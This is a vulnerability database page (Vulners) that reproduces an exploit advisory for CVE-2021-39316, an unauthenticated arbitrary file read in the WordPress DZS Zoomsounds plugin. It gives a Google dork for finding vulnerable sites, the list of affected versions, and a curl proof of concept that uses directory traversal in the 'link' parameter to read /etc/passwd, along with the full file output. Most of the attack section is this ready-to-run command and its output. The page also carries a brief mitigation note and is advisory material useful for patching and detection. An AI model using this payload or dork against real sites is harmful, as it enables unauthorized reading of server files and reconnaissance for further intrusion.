Vulners
Lucene search
WordPress DZS Zoomsounds 6.45 Arbitrary File Read
🗓️ 03 Dec 2021 00:00:00Reported by Uriel YochpazType 
packetstorm🔗 packetstormsecurity.com👁 424 Views
| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
 | WordPress DZS Zoomsounds 6.45 Plugin - Arbitrary File Read (Unauthenticated) Vulnerability | 4 Dec 202100:00 | – | zdt |
 | CVE-2021-39316 | 31 Aug 202116:33 | – | circl |
 | WordPress 插件路径遍历漏洞 | 31 Aug 202100:00 | – | cnnvd |
 | CVE-2021-39316 | 31 Aug 202111:05 | – | cve |
 | CVE-2021-39316 ZoomSounds <= 6.45 Unauthenticated Directory Traversal and Sensitive Information Dislosure | 31 Aug 202111:05 | – | cvelist |
 | WordPress DZS ZoomSounds < 6.50 File Disclosure | 26 Sep 202100:00 | – | dsquare |
 | WordPress Plugin DZS Zoomsounds 6.45 - Arbitrary File Read (Unauthenticated) | 3 Dec 202100:00 | – | exploitdb |
 | WordPress DZS Zoomsounds <=6.50 - Local File Inclusion | 8 Jun 202604:09 | – | nuclei |
 | CVE-2021-39316 | 31 Aug 202112:15 | – | nvd |
 | WordPress Multiple Plugins / Themes Directory Traversal / File Download Vulnerability (HTTP) | 20 Nov 202000:00 | – | openvas |
10
`# Exploit Title: WordPress Plugin DZS Zoomsounds 6.45 - Arbitrary File Read (Unauthenticated)
# Google Dork: inurl:/wp-content/plugins/dzs-zoomsounds/
# Date: 2/12/2021
# Exploit Author: Uriel Yochpaz
# Vendor Homepage: https://digitalzoomstudio.net/docs/wpzoomsounds/
# Software Link:
# Version: 1.10, 1.20, 1.30, 1.40, 1.41, 1.43, 1.45, 1.50, 1.51, 1.60, 1.61, 1.62, 1.63, 1.70, 2.00, 2.02, 2.10, 2.20, 2.30, 2.42, 2.43, 2.44, 2.45, 2.46, 2.51, 2.60, 2.61, 2.62, 2.63, 2.64, 2.70, 2.72, 2.75, 3.00, 3.01, 3.03, 3.04, 3.10, 3.12, 3.21, 3.23, 3.24, 3.30, 3.31, 3.32, 3.33, 3.40, 4.00, 4.10, 4.15, 4.20, 4.32, 4.47, 4.51, 4.63, 5.00, 5.03, 5.04, 5.12, 5.18, 5.30, 5.31, 5.48, 5.60, 5.70, 5.82, 5.84, 5.91, 5.93, 5.95, 5.96, 6.00, 6.10, 6.21, 6.34, 6.45
# Tested on: Linux (DZS Zoomsounds version 5.82)
# CVE : CVE-2021-39316
The vulnerability allows a remote attacker to perform directory traversal attacks.
The vulnerability exists due to input validation error when processing directory traversal sequences in the "link" parameter in the "dzsap_download" action. A remote attacker can send a specially crafted HTTP request and read arbitrary files on the system.
Mitigation:
Install update from vendor's website.
Vulnerable software versions ZoomSounds:
1.10, 1.20, 1.30, 1.40, 1.41, 1.43, 1.45, 1.50, 1.51, 1.60, 1.61, 1.62, 1.63, 1.70, 2.00, 2.02, 2.10, 2.20, 2.30,
2.42, 2.43, 2.44, 2.45, 2.46, 2.51, 2.60, 2.61, 2.62, 2.63, 2.64, 2.70, 2.72, 2.75, 3.00, 3.01, 3.03, 3.04, 3.10,
3.12, 3.21, 3.23, 3.24, 3.30, 3.31, 3.32, 3.33, 3.40, 4.00, 4.10, 4.15, 4.20, 4.32, 4.47, 4.51, 4.63, 5.00, 5.03,
5.04, 5.12, 5.18, 5.30, 5.31, 5.48, 5.60, 5.70, 5.82, 5.84, 5.91, 5.93, 5.95, 5.96, 6.00, 6.10, 6.21, 6.34, 6.45
PoC:
user@ubuntu:~$ curl "http://localhost/MYzoomsounds/?action=dzsap_download&link=../../../../../../../../../../etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
user:x:1000:1000:user,,,:/home/user:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Dec 2021 00:00Current
7.7High risk
Vulners AI Score7.7
CVSS 25
CVSS 3.17.5
EPSS0.93526
SSVC